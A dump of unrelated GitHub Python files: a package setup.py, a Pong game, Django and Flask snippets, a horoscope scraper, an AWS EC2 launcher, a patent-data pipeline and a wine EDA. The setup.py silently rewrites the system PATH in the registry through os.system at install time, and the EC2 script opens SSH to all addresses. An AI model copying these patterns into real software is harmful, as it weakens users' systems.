[\n repository_url + 'third_party/HTML.py-0.04-py3.2.egg',\n 'http://www.decalage.info/files/',\n 'http://pypi.python.org/pypi/colorama',\n repository_url + 'third_party/windows/HTML.py-0.04-py3.2.egg', #html for win32\n]\n\n# python-библиотеки, необходимые для разработчика.\n# Формат аналогичен предыдущему пункту.\n# dependency_links с предыдущим пунктом общие.\ndevelop_requires = [\n #'coverage',\n 'mox',\n]\n\nextras_require = {\n 'develop' : develop_requires\n}\n\ntry:\n from setup_extensions.develop import develop\nexcept ImportError as e:\n print('Error while importing develop extension: %s' % (str(e)))\nsetup_params = {\n 'name' : 'Please',\n 'version' : '0.3',\n 'description' : '***',\n 'package_dir' : {'please': 'please'},\n 'packages' : ['please.' + x for x in find_packages('please')] + ['please'],\n 'package_data' : package_data,\n 'install_requires' : install_requires,\n 'extras_require' : extras_require,\n 'dependency_links' : dependency_links,\n 'entry_points' : entry_points,\n 'cmdclass' : {'develop' : develop},\n}\n\nsetup(**setup_params)\n\n\nimport platform\nsystem = platform.system()[0]\nif (system == 'W'):\n log.info(\"\\nChecking Path variable...\")\n from distutils import sysconfig as conf\n path = os.getenv('path').replace('\"', '').split(';')\n log.info(\"Path: %s\", os.getenv('path'))\n pp = os.path.join(conf.PREFIX, 'scripts')\n if (not (pp in path or (pp + os.sep) in path)):\n req = 'echo Y | reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v PATH /t REG_SZ /d \"%s;%s\"' % (os.getenv('path'), pp)\n log.info('calling ' + req)\n os.system(req)\n log.info('Added %s to path', pp)\n log.info('\\nTo apply changes, after the installation, please reboot the computer.')\n\n\nlog.info('\\nInstallation finished!')\n","repo_name":"parallel-p/please","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"ru","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"11076290772","text":"from turtle import Screen, Turtle\nfrom paddle import Paddle # to import Paddle class from paddle.py\nfrom ball import Ball # to import Ball class from ball.py\nfrom scoreboard import Scoreboard # to import class Scoreboard class from scoreboard.py\nimport time # to import time module\n\nscreen = Screen()\nscreen.bgcolor(\"black\") # set screen color to black\nscreen.setup(width=800, height=600) # set screen dimensions\nscreen.title(\"Pong\") # set screen title to Pong\nscreen.tracer(0) # to control animation of turtle\n\nr_paddle = Paddle((350, 0)) # create right side paddle from Paddle class\nl_paddle = Paddle((-350, 0)) # create left side paddle from Paddle class\nball = Ball() # create an instance of Ball class\nscoreboard = Scoreboard() # create instance of Scoreboard class\n\nscreen.listen() # to make screen listen to keystrokes\nscreen.onkey(r_paddle.go_up, \"Up\") # bind function with 'Up' key\nscreen.onkey(r_paddle.go_down, \"Down\") # bind function with 'Down' key\nscreen.onkey(l_paddle.go_up, \"w\") # bind function with 'w' key\nscreen.onkey(l_paddle.go_down, \"s\") # bind function with 's' key\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(ball.move_speed)\n ball.move()\n\n #Detect collision with wall\n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n\n #Detect collision with paddle\n if ball.distance(r_paddle) < 50 and ball.xcor() > 320 or ball.distance(l_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n\n #Detect R paddle misses\n if ball.xcor() > 380:\n ball.reset_position()\n scoreboard.l_point()\n\n #Detect L paddle misses:\n if ball.xcor() < -380:\n ball.reset_position()\n scoreboard.r_point()\n \n # winner selection criteria and stop the game \n if abs(scoreboard.l_score-scoreboard.r_score) >= 5:\n if scoreboard.l_score > scoreboard.r_score:\n scoreboard.winner_l()\n time.sleep(2)\n game_on = False\n screen.exitonclick()\n if scoreboard.r_score > scoreboard.l_score:\n scoreboard.winner_r()\n time.sleep(2)\n game_on = False\n screen.exitonclick()\n\n\n","repo_name":"skr2379/pong","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30032580885","text":"from django.urls import path\nfrom .views import Home, Create, defaultAdress, Edit, deleteAdress\n\napp_name = 'shipping_adress'\n\nurlpatterns = [\n path('',Home.as_view(),name='list'),\n path('create',Create.as_view(),name='create'),\n path('default',defaultAdress,name='default'),\n path('edit/
Hello World
\\n\"\n basic = \"\"\n page += \"\\n\"\n\n print(page)\n\n return page\n\n\nif __name__ == '__main__':\n # Actual address: http://
' #define onde deve começar e terminar o texto a ser impresso para o usuário.\n marcador_final = 'Compartilhar'\n\n inicio = pagina.find(marcador_inicio) + len(marcador_inicio)\n final = pagina.find(marcador_final, inicio)\n\n return signo_desejado + ': ' + pagina[inicio:final].strip()\n\ndef separar_data(dma): #A função \"separa_data(dma)\",separa a data de nascimento informada pelo usuário, retornando o dia, mês e ano. \n a = dma % 10000 #Com isso, é possível identificar o signo através da função \"signo(dia,mes)\".\n dma //= 10000\n\n m = dma % 100\n dma //= 100\n\n d = dma\n return d, m, a\n\n\ndef remover_acentos(texto):\n from unicodedata import normalize\n\n return normalize('NFKD', texto).encode('ASCII', 'ignore').decode('ASCII')\n\ndef main():\n nascimento = int(input('Digite sua data de nascimento no formato DDMMAAAA: '))\n\n dia, mes, _ = separar_data(nascimento)\n meu_signo = signo(dia, mes)\n horoscopo_de_hoje = horoscopo(meu_signo)\n\n print(horoscopo_de_hoje)\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"josevitor32/atividades-pec","sub_path":"Atividade02-sem08-/atividade.py","file_name":"atividade.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69895194322","text":"from app.models.model_test_request import TestRequest\nfrom app.core.utils import return_current_time\nfrom fastapi import APIRouter\nimport os\n\nROUTER = APIRouter()\n\n\n@ROUTER.get(\"/\")\ndef test_func_request(request_item):\n \"\"\"\n endpoint.\n \"\"\"\n folder, file = os.path.split(request_item)\n return {\n \"request_item\": request_item,\n \"folder\": folder,\n \"file\": file,\n \"date\": return_current_time()\n }\n","repo_name":"dayvagrant/empty_api","sub_path":"app/api/test_request.py","file_name":"test_request.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33645315523","text":"#####################################################################################\n# Cloud Computing HW - 1 #\n# Create an Instance Programmatically #\n# #\n# Author: Avaiyang Garg, ag6026 #\n# #\n#####################################################################################\n\nimport boto3\nimport sys\nimport os\nimport random\n\n# To create a key-pair for the instance\ndef create_key_pair(VarKeyName):\n ec2 = boto3.resource('ec2')\n \n # generating a key-pair\n output = open(VarKeyName+'.pem','w')\n keyPair = ec2.create_key_pair(KeyName=VarKeyName)\n KeyPairOut = str(keyPair.key_material)\n output.write(KeyPairOut)\n\n# To create a new instance\ndef create_instance(KeyPair, GroupId):\n ec2 = boto3.resource('ec2')\n\n # here we are using the Amazon Linux 2 AMI with the instance type micro\n instance = ec2.create_instances(ImageId='ami-04681a1dbd79675a5', MinCount=1, MaxCount=1, InstanceType='t2.micro', KeyName = KeyPair, SecurityGroupIds = [GroupId])\n print(\"\\nA new instance is created\\n\")\n print(\"Instance ID : \",instance[0].id)\n \n return instance[0].id\n\n# To create a security group for the instance\ndef create_security_group(sgName, sgDesc):\n ec2 = boto3.resource('ec2')\n securityGr = ec2.create_security_group(GroupName=sgName, Description=sgDesc)\n securityGr.authorize_ingress(IpProtocol=\"tcp\",CidrIp=\"0.0.0.0/0\",FromPort=22,ToPort=22)\n return securityGr.id\n\n# List all instances\ndef list_instances():\n ec2 = boto3.resource('ec2')\n \n # printing all the instances\n for instance in ec2.instances.all():\n print('\\n')\n print(\"The Instance ID : \",instance.id)\n print(\"State of Instance : \", instance.state)\n print(\"IP of the Instance: \", instance.public_ip_address)\n print(\"Region of the Instance: \", instance.placement['AvailabilityZone'])\n print(\"DNS:\",instance.public_dns_name)\n\n# To terminate the instance\ndef terminate_instance(id):\n ec2 = boto3.resource('ec2')\n instance = ec2.Instance(id)\n response = instance.terminate()\n print(\"\\nInstance is terminated:\\n\",response)\n\n# To remove the key-pair from the system and the AWS\ndef removeKeyPair(keyName):\n #To remove from the local system\n if os.path.exists(keyName+'.pem'):\n os.remove(keyName+'.pem')\n\n # To remove the key-pair from AWS\n ec2 = boto3.client('ec2')\n response = ec2.delete_key_pair(KeyName=keyName)\n\ndef main():\n keyPairName= \"CloudKeyPair\"\n #generating random name for the security group\n randomValue = random.randint(1, 100)\n securityGroupName = \"Cloud\"\n \n if (len(sys.argv) >= 2): \n #terminating the instance\n terminate_instance(sys.argv[1])\n print(\"The instance is terminated\")\n \n #removing the key-pair files\n removeKeyPair(keyPairName)\n print(\"The key is been deleted from the system and AWS\")\n\n else:\n removeKeyPair(keyPairName)\n # removeKeyAWS(keyPairName)\n create_key_pair(keyPairName)\n \n securityGroup = create_security_group(securityGroupName+str(randomValue), \"Security Group\")\n instance = create_instance(keyPairName, securityGroup)\n \n # to display all the instances\n list_instances()\n\n print('\\nTerminate the instance by providing the instance-id as argument\\n')\n\nif __name__ == '__main__': main()","repo_name":"avaiyang/AWS-EC2-Programmatically","sub_path":"Ec2-instance.py","file_name":"Ec2-instance.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2953989174","text":"#Code to accept names of the 6 Winx Saga Fairies and ask user for their fairy type.\n\nfairies = [] #empty list to collect input of fairies\nvalid_fairies = [\"Bloom\",\"Aisha\",\"Musa\",\"Terra\",\"Flora\",\"Stella\"] #list holding valid names of fairies the program will run user input through to validate\n\nfor i in range(6): #ask for 6 inputs\n while True:\n name_of_fairies = input(f\"Enter name of fairy {i + 1}: \") #ask user to input names, i+1 to make it look like \"Enter name of fairy 1\"\n if len(name_of_fairies) != 0 and name_of_fairies in valid_fairies : # Add names to the empty list if and only if the length of the list is not zero and the names of fairies inputted corresponds with the valid list containing fairy names\n fairies.append(name_of_fairies) #Add input to empty list\n break #leave loop and continue\n else:\n print(\"Invalid Fairy Name!\") #If those conditions aren't met, print this\n\ntypes_of_fairies = [\"Fire Fairy\", \"Water Fairy\", \"Mind Fairy\", \"Earth Fairy\", \"Nature Fairy\", \"Light Fairy\"] #List containing each type of fairy from the valid_fairies list\n\nif len(fairies) > 2: # Check if there are at least 3 fairies\n \n fairy_index = 2 #Index of the fairy in the list the question will be based on\n \n if len(fairies) > fairy_index: #check if the inputs in the fairies list is more than the fairy index, i.e it checks if there are more than 3 fairies in the list so it has enough input to continue\n fairy_name = fairies[fairy_index] #variable fairy name is equal to the value of the fairy index. The name of the fairy in fairy index is stored in this variable\n if fairy_name in valid_fairies: #checks if the name of the fairy is one of the valid names in the list\n index_in_valid_fairies = valid_fairies.index(fairy_name) #variable stores the index of the fairy name in the list of valid fairy names\n fairy_type = types_of_fairies[index_in_valid_fairies] #variable uses the index gotten from the list of valid fairies and equates it to the same index in the type of fairies list\n fairy_question= input(f\" What type of fairy is {fairy_name}?: \") #ask the type of fairy based on the fairy name\n if fairy_question == fairy_type: #if the input is correct, print..\n print(\"Indisputably correct!\")\n else: #else print...\n print(\"FAIL!\")\n else: #if fairy is not in list..\n print(\"Fairy not in list\")\n else: #if the amount of fairies in the list is less than the fairy index...i.e if the amount of input given to the program is less than the fairy index, it cannot continue\n print(f\"Amount of fairies must be at least {fairy_index + 1}\")\n \n \nelse: #if there aren't three fairies in the list at least...\n print (\"Enter up to three fairies\")\n","repo_name":"hamzakhan663/Learning-PY","sub_path":"FateFairies.py","file_name":"FateFairies.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23417141972","text":"# This script takes the Fleming et al. (2019) data and the USPTO HPDF (Marco et al, 2015)\n# data to construct a technology subclass by year panel dataset for the main analysis in\n# Public R&D and Spillovers: Evidence from NASA Patents (Chau, 2022)\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport gc\n\nos.chdir(\"/Users/terencechau/Dropbox/Work/Research\")\n\n# Load Fleming data, which contains federal reliance attribution for each patent\n# Metadata contains specifies the federal agency involved\n# Category details the type of federal reliance\n# Note: R version loads the original tsvs using data.table, but Python can't parse a\n# typo with an extra quotation mark in the data, so the files have been converted to csv\n# and engine set to \"python\" to work here\nfleming_data = pd.read_csv(\n \"NASA/input/government_patents/uspto.govt.reliance.metadata.csv\", engine=\"python\"\n)\nfleming_data_2 = pd.read_csv(\n \"NASA/input/government_patents/uspto.govt.reliance.category.csv\", engine=\"python\"\n)\nfleming_data.columns = fleming_data.columns.str.lower()\nfleming_data_2.columns = fleming_data_2.columns.str.lower()\n\n# Save patents that are directly owned or contracted by a federal agency\ncategory_1_2 = fleming_data_2.query(\n \"category_1_owned_by_usgovt==1|category_2_acknowledge_usgovt_support==1\"\n)[\"patno\"]\n\nfleming_data = fleming_data.query(\"patno in @category_1_2\")\ndel category_1_2\n\n# Load HPDF data, which contains all patents issued and their technology classification\nall_patents = pd.read_csv(\n \"Patents/input/USPTO HPDF/historical_masterfile.csv\",\n dtype={\"uspc\": str, \"uspc_sub\": str, \"disp_dt\": str},\n)\n\n# Drop patents with non-valid USPC codes\ninvalid_uspcs = [\"\", \"000\", \"PLT\", \"XXX\", \"999\"]\nall_patents = all_patents.loc[np.logical_not(all_patents[\"uspc\"].isin(invalid_uspcs))]\nall_patents = all_patents.dropna(subset=\"uspc\")\n\n# Drop design patents\nall_patents = all_patents.loc[np.logical_not(all_patents[\"uspc\"].str.contains(\"D\"))]\n\n# Drop patents with non-valid USPC subclass codes\ninvalid_uspc_subs = [\"\", \"PCT\", \"XXX\"]\nall_patents = all_patents.loc[\n np.logical_not(all_patents[\"uspc_sub\"].isin(invalid_uspc_subs))\n]\nall_patents = all_patents.dropna(subset=\"uspc_sub\")\n\nall_patents = all_patents.rename(columns={\"patent\": \"patent_id\"})\nfleming_data = fleming_data.rename(columns={\"patno\": \"patent_id\"})\n\nall_patents[\"uspc\"] = all_patents[\"uspc\"].map(str).str.replace(\"\\.[0-9]*\", \"\")\nall_patents[\"uspc_sub\"] = all_patents[\"uspc_sub\"].map(str)\nall_patents[\"uspc_sub_long\"] = all_patents[\"uspc\"].str.cat(\n all_patents[\"uspc_sub\"], sep=\"_\"\n)\nall_patents[\"year_issue\"] = all_patents[\"disp_dt\"].str[5:]\nall_patents[\"year_issue\"] = all_patents[\"year_issue\"].astype(\"Int64\")\n\n# Add technology class to government patents\ngovt_patents = pd.merge(\n fleming_data[\n [\"patent_id\", \"grantyear\", \"dod\", \"doe\", \"nasa\", \"nsf\", \"hhs\", \"usda\", \"others\"]\n ],\n all_patents[[\"patent_id\", \"uspc\", \"uspc_sub_long\"]],\n how=\"left\",\n on=\"patent_id\",\n)\n\n#################################################################################\n############################# GET CITATIONS #####################################\n#################################################################################\n\n# Prepare citation data\n\n# Load citation data from Fleming\nold_citations = pd.read_table(\n \"NASA/input/government_patents/uspto.citation.1926-1975.tsv\"\n)\nnew_citations = pd.read_table(\n \"NASA/input/government_patents/uspto.citation.1976-2017.tsv\"\n)\n\n# Filter to citations made to US patents\nnew_citations = new_citations.query(\"country in ['US', 'USA']\")\n\n# Clean and count forward citations for each patent in the Fleming data\nold_citations = old_citations.drop(columns=\"id\")\nnew_citations = new_citations.drop(columns=\"country\")\n\ncitations = pd.concat([old_citations, new_citations])\n\ndel old_citations\ndel new_citations\ngc.collect()\n\ncitations[\"cited\"] = citations[\"cited\"].astype(\"string\")\ncitations[\"citing\"] = citations[\"citing\"].astype(\"string\")\ncitations = citations[citations[\"cited\"].str.contains(\"^[0-9]+$\")]\ncitations = citations[citations[\"citing\"].str.contains(\"^[0-9]+$\")]\n\n# Identify if citing or cited patents are NASA\nnasa_patent_ids = fleming_data.query(\"nasa > 0\")[\"patent_id\"]\n\ncitations[\"citing_nasa\"] = np.where(citations[\"citing\"].isin(nasa_patent_ids), 1, 0)\ncitations[\"cited_nasa\"] = np.where(citations[\"cited\"].isin(nasa_patent_ids), 1, 0)\n\n# Merge cited patent year of issue and uspc into citations data from HPDF file\nall_patents = all_patents.rename(\n columns={\n \"patent_id\": \"cited\",\n \"year_issue\": \"cited_year\",\n \"uspc\": \"cited_uspc\",\n \"uspc_sub_long\": \"cited_uspc_sub\",\n }\n)\ncitations = pd.merge(\n citations,\n all_patents[[\"cited\", \"cited_year\", \"cited_uspc\", \"cited_uspc_sub\"]],\n how=\"left\",\n on=\"cited\",\n)\n\n# Merge citing patent year of issue and uspc into citations data from HPDF file\nall_patents = all_patents.rename(\n columns={\n \"cited\": \"citing\",\n \"cited_year\": \"citing_year\",\n \"cited_uspc\": \"citing_uspc\",\n \"cited_uspc_sub\": \"citing_uspc_sub\",\n }\n)\ncitations = pd.merge(\n citations,\n all_patents[[\"citing\", \"citing_year\", \"citing_uspc\", \"citing_uspc_sub\"]],\n how=\"left\",\n on=\"citing\",\n)\n\ncitations[\"citation_delta\"] = citations[\"citing_year\"] - citations[\"cited_year\"]\n\n# Reset names in all patents\nall_patents = all_patents.rename(\n columns={\n \"citing\": \"patent_id\",\n \"citing_year\": \"year_issue\",\n \"citing_uspc\": \"uspc\",\n \"citing_uspc_sub\": \"uspc_sub_long\",\n }\n)\n\n# Count citations at the subclass by year level\n# For each citation outcome, count: total, total excluding NASA, leave one out\n# subclass (LOO), leave one out excluding NASA, leave one out broad class (LOO B),\n# leave one out broad excluding NASA.\n# Also count number of other subclasses citing reference class\ncitations[\"cond_1\"] = np.where(\n np.logical_or(citations[\"cited_nasa\"] != 1, citations[\"citing_nasa\"] != 1),\n 1,\n 0,\n)\n\ncitations[\"cond_2\"] = np.where(\n np.logical_not(citations[\"cited_uspc_sub\"] == citations[\"citing_uspc_sub\"]),\n 1,\n 0,\n)\n\ncitations[\"cond_3\"] = np.where(\n np.logical_not(citations[\"cited_uspc\"] == citations[\"citing_uspc\"]), 1, 0\n)\n\ncitations[\"cond_4\"] = np.where(\n np.logical_not(citations[\"citation_delta\"].isin(np.arange(0, 20))), 1, 0\n)\n\ncitations[\"cond_5\"] = np.where(\n np.logical_and(citations[\"cond_1\"], citations[\"cond_2\"]), 1, 0\n)\n\ncitations[\"cond_6\"] = np.where(\n np.logical_and(citations[\"cond_1\"], citations[\"cond_3\"]), 1, 0\n)\n\ncitations[\"cond_7\"] = np.where(\n np.logical_and(citations[\"cond_1\"], citations[\"cond_4\"]), 1, 0\n)\n\ncitations[\"cond_8\"] = np.where(\n np.logical_and(citations[\"cond_2\"], citations[\"cond_4\"]), 1, 0\n)\n\ncitations[\"cond_9\"] = np.where(\n np.logical_and(citations[\"cond_3\"], citations[\"cond_4\"]), 1, 0\n)\n\ncitations[\"cond_10\"] = np.where(\n np.logical_and(citations[\"cond_5\"], citations[\"cond_4\"]),\n 1,\n 0,\n)\n\ncitations[\"cond_11\"] = np.where(\n np.logical_and(citations[\"cond_6\"], citations[\"cond_4\"]),\n 1,\n 0,\n)\n\n# Get lifetime and 20 year window citations\ncitations_df_1 = citations.groupby(\n [\"cited_uspc_sub\", \"cited_year\"], as_index=False\n).agg(\n citations_lifetime=(\"citing\", \"count\"),\n citations_lifetime_excl_nasa=(\"cond_1\", \"sum\"),\n citations_lifetime_loo=(\"cond_2\", \"sum\"),\n citations_lifetime_loo_excl_nasa=(\"cond_5\", \"sum\"),\n citations_lifetime_loo_b=(\"cond_3\", \"sum\"),\n citations_lifetime_loo_b_excl_nasa=(\"cond_6\", \"sum\"),\n citations_20_yr=(\"cond_4\", \"sum\"),\n citations_20_yr_excl_nasa=(\"cond_7\", \"sum\"),\n citations_20_yr_loo=(\"cond_8\", \"sum\"),\n citations_20_yr_loo_excl_nasa=(\"cond_10\", \"sum\"),\n citations_20_yr_loo_b=(\"cond_9\", \"sum\"),\n citations_20_yr_loo_b_excl_nasa=(\"cond_11\", \"sum\"),\n)\n\n# Get citations by year\ncitations_df_2 = citations.groupby(\n [\"cited_uspc_sub\", \"citing_year\"], as_index=False\n).agg(\n citations_year=(\"citing\", \"count\"),\n citations_year_excl_nasa=(\"cond_1\", \"sum\"),\n citations_year_loo=(\"cond_2\", \"sum\"),\n citations_year_loo_excl_nasa=(\"cond_5\", \"sum\"),\n citations_year_loo_b=(\"cond_3\", \"sum\"),\n citations_year_loo_b_excl_nasa=(\"cond_6\", \"sum\"),\n)\n\n# Fix names and merge into one df\n# Note from now on, uspc_sub refers to the cited uspc_sub\ncitations_df_1 = citations_df_1.rename(columns={\"cited_year\": \"year\"})\ncitations_df_2 = citations_df_2.rename(columns={\"citing_year\": \"year\"})\n\ncitations_df = pd.merge(\n citations_df_1, citations_df_2, on=[\"cited_uspc_sub\", \"year\"], how=\"outer\"\n)\n\ndel citations\ndel citations_df_1\ndel citations_df_2\ngc.collect()\n\ncitations_df = citations_df.dropna(subset=[\"cited_uspc_sub\", \"year\"], how=\"any\")\ncitations_df = citations_df[\n np.logical_and(citations_df[\"year\"] != \"\", citations_df[\"cited_uspc_sub\"] != \"\")\n]\n\ncitations_df = citations_df.rename(columns={\"cited_uspc_sub\": \"uspc_sub\"})\ncitations_df = citations_df.sort_values(by=[\"uspc_sub\", \"year\"])\n\n#################################################################################\n############################## GET COUNTS #######################################\n#################################################################################\n\n# Counts by issue year\ncounts_issued = all_patents.groupby(\n [\"uspc_sub_long\", \"year_issue\"], as_index=False\n).agg(issued=(\"patent_id\", \"count\"))\ncounts_issued = counts_issued.rename(columns={\"year_issue\": \"year\"})\ncounts_issued = counts_issued.dropna(subset=[\"uspc_sub_long\", \"year\"], how=\"any\")\ncounts_issued = counts_issued.sort_values(by=[\"uspc_sub_long\", \"year\"])\n\n# Counts by issue year without NASA\nall_patents[\"not_nasa\"] = np.where(all_patents[\"patent_id\"].isin(nasa_patent_ids), 0, 1)\ncounts_issued_excl_nasa = all_patents.groupby(\n [\"uspc_sub_long\", \"year_issue\"], as_index=False\n).agg(issued_excl_nasa=(\"not_nasa\", \"sum\"))\ncounts_issued_excl_nasa = counts_issued_excl_nasa.rename(columns={\"year_issue\": \"year\"})\ncounts_issued_excl_nasa = counts_issued_excl_nasa.dropna(\n subset=[\"uspc_sub_long\", \"year\"]\n)\ncounts_issued_excl_nasa = counts_issued_excl_nasa.sort_values(\n by=[\"uspc_sub_long\", \"year\"]\n)\n\n# Counts by application year (using Enrico's data)\ncusp_years = pd.read_csv(\"CUSP Berkes Data/patents_fyear_iyear_1940_1980.csv\")\ncusp_years = cusp_years.rename(columns={\"patnum\": \"patent_id\", \"fyear\": \"year\"})\ncusp_years[\"patent_id\"] = cusp_years[\"patent_id\"].astype(\"string\")\ncusp_years[\"year\"] = cusp_years[\"year\"].astype(\"Int64\")\ncusp_years = pd.merge(\n cusp_years, all_patents[[\"patent_id\", \"uspc_sub_long\"]], on=\"patent_id\", how=\"left\"\n)\ncounts_applied = cusp_years.groupby([\"uspc_sub_long\", \"year\"], as_index=False).agg(\n applied=(\"patent_id\", \"count\")\n)\n\ncounts_df = pd.merge(\n counts_issued, counts_issued_excl_nasa, on=[\"uspc_sub_long\", \"year\"], how=\"outer\"\n)\ncounts_df = pd.merge(\n counts_df, counts_applied, on=[\"uspc_sub_long\", \"year\"], how=\"outer\"\n)\ncounts_df = counts_df.rename(columns={\"uspc_sub_long\": \"uspc_sub\"})\ncounts_df = counts_df.dropna(subset=\"uspc_sub\")\ncounts_df = counts_df.sort_values(by=[\"uspc_sub\", \"year\"])\n\ndel counts_issued\ndel counts_issued_excl_nasa\ndel counts_applied\ndel cusp_years\ngc.collect()\n\n#################################################################################\n##################### GET FIRST YEAR FOR EACH USPC_SUB ##########################\n#################################################################################\n\nfirst_year = all_patents.groupby(\"uspc_sub_long\", as_index=False).agg(\n first_year=(\"year_issue\", \"min\")\n)\nfirst_year = first_year.rename(columns={\"uspc_sub_long\": \"uspc_sub\"})\n\n#################################################################################\n######################### CREATE EVENT STUDY DF #################################\n#################################################################################\n\n# Assemble control group and DOD/NASA overlaps\nagency_list = [\"dod\", \"nasa\", \"doe\", \"nsf\", \"hhs\", \"usda\", \"others\"]\ngovt_patents[agency_list] = (govt_patents[agency_list] > 0).astype(\"Int64\")\ngovt_classes = govt_patents.groupby(by=\"uspc_sub_long\").sum(numeric_only=True)[\n agency_list\n]\ngovt_classes = govt_classes.loc[(govt_classes != 0).any(axis=1)]\ngovt_classes = govt_classes.reset_index(level=0)\n\ngovt_classes_pre = (\n govt_patents.query(\"grantyear >= 1948 and grantyear <= 1980\")\n .groupby(by=\"uspc_sub_long\")\n .sum(numeric_only=True)[agency_list]\n)\ngovt_classes_pre = govt_classes_pre.loc[(govt_classes_pre != 0).any(axis=1)]\ngovt_classes_pre = govt_classes_pre.reset_index(level=0)\n\nnasa_classes = govt_classes.loc[govt_classes[\"nasa\"] > 0]\nnasa_dod_overlap = nasa_classes.loc[nasa_classes[\"dod\"] > 0]\n\n# Prepare regression sample:\n# 1. Subset all data from 1948 to 1980\n# 2. Narrow technology classes that were present before 1958\n# 3. Classes that some government agency worked on before 1958 (control) and NASA classes\n# worked on 1958 to 1972 (treatment).\n# 4. Classes that do already exist get NA filled with zero but only after their existence year\n# (because the class is confirmed to exist, but not all years will get a patent)\n\nevent_study_df = pd.merge(citations_df, counts_df, on=[\"uspc_sub\", \"year\"], how=\"outer\")\nevent_study_df = event_study_df.loc[\n np.logical_and(event_study_df[\"year\"] >= 1948, event_study_df[\"year\"] <= 1980)\n]\n\npre_1958_uspcs = first_year.loc[first_year[\"first_year\"] <= 1958, \"uspc_sub\"]\nevent_study_df = event_study_df.loc[event_study_df[\"uspc_sub\"].isin(pre_1958_uspcs)]\nevent_study_df = event_study_df.loc[\n event_study_df[\"uspc_sub\"].isin(\n np.logical_or(govt_classes_pre[\"uspc_sub_long\"], nasa_classes[\"uspc_sub_long\"])\n )\n]\nevent_study_df = event_study_df.fillna(0)\n\nevent_study_df[\"treated\"] = (\n event_study_df[\"uspc_sub\"].isin(nasa_classes[\"uspc_sub_long\"]).astype(\"int\")\n)\nevent_study_df[\"event_time\"] = np.where(\n event_study_df[\"treated\"] == 1, event_study_df[\"year\"] - 1958, 0\n)\nevent_study_df[\"D\"] = (event_study_df[\"treated\"] * event_study_df[\"event_time\"]).astype(\n \"category\"\n)\n\nevent_study_df.to_csv(\"NASA/final_output/event_study_df_python.csv\")\n","repo_name":"terencechau/space-race-spillovers","sub_path":"other/python/1_prepare_data.py","file_name":"1_prepare_data.py","file_ext":"py","file_size_in_byte":14125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31353465204","text":"class QueryParam(object):\n \"\"\"\n ...\n Examples:\n @GetMapping('/users')\n def test(self, limit: QueryParam('limit', 10, int)):\n ...\n \"\"\"\n\n def __init__(self, name: str, _type: type, default: any = None) -> None:\n self.name: str = name\n self.default = default\n self._type = _type\n\n def get_value(self, query_params: dict[str, str]):\n v = query_params.get(self.name, self.default)\n if v is not None:\n return self._type(v)\n return v\n","repo_name":"florianbematol/py3server","sub_path":"py3server/web/params/query_param.py","file_name":"query_param.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34601693913","text":"from turtle import color\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder \nfrom sklearn.metrics import accuracy_score,precision_score,recall_score\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\n# Importar DB\n\nurl_red = 'https://raw.githubusercontent.com/terranigmark/curso-analisis-exploratorio-datos-platzi/main/winequality-red.csv'\nurl_white = 'https://raw.githubusercontent.com/terranigmark/curso-analisis-exploratorio-datos-platzi/main/winequality-white.csv'\n\nwine_red = pd.read_csv(url_red, sep=';')\nwine_white = pd.read_csv(url_white, sep=';')\n\nwine_white.head()\n\n# Forma 1 de unir los DF red & white\n\nwine_red['color'] = 'red'\nwine_white['color'] = 'white'\n\n\ndf_wine = wine_red.append(wine_white)\ndf_wine\nprint('='*158)\n\n# Forma 2 de unir los DF red & white\n\ndf_wine = pd.concat([wine_red, wine_white])\nprint(df_wine.head())\nprint('='*158)\n\n# Determinamos los valores estadisticos de algunas de las variables de forma transpuesta\n\nprint(df_wine.describe().T)\nprint('='*158)\n\n# Ploteo los valores\ndf_wine.plot()\nplt.title(\"wine variables\")\nplt.show()\n\n# Grafico la densidad\n\ndf_wine['density'].plot()\nplt.title(\"Wine Density\", fontsize= 20, pad='15',fontstyle='italic')\nplt.xlabel('Variables')\nplt.ylabel('Density')\nplt.show()\n\n#R/= Descubro que la densidad posee valores atipicos \n\n# Descubro cuales son valores que determinan la calidad del vino y los grafico\nsns.set(rc={'figure.figsize': (14, 8)})\nsns.countplot(df_wine['quality'])\nplt.title(\"Wine Quality\", fontsize= 20, pad='15',fontstyle='italic')\nplt.show()\n\n#R/ = Por indagacion previa, se descubrio que mientras mas alto el valor mejor es la calidad del vino.\n# Por eso divido la calidad del vino en sus 3 mayores valores que corresponden a \n# Baja <= 5, Media = 6, Alta => 7\n\n# Hago una visualizacion grafica de los patrones. Se observan las distribuciones de las mismas\n# sns.pairplot(df_wine)\n# plt.show()\n\n# Grafico la correlacion entre las variables\n\nsns.heatmap(df_wine.corr(), annot = True, fmt = '.2f', linewidths = 2, cmap = 'coolwarm')\nplt.title(\"Correlation Diagram\", fontsize= 20, pad='15',fontstyle='italic')\nplt.show()\n\n# Debido a la alta correlacion que 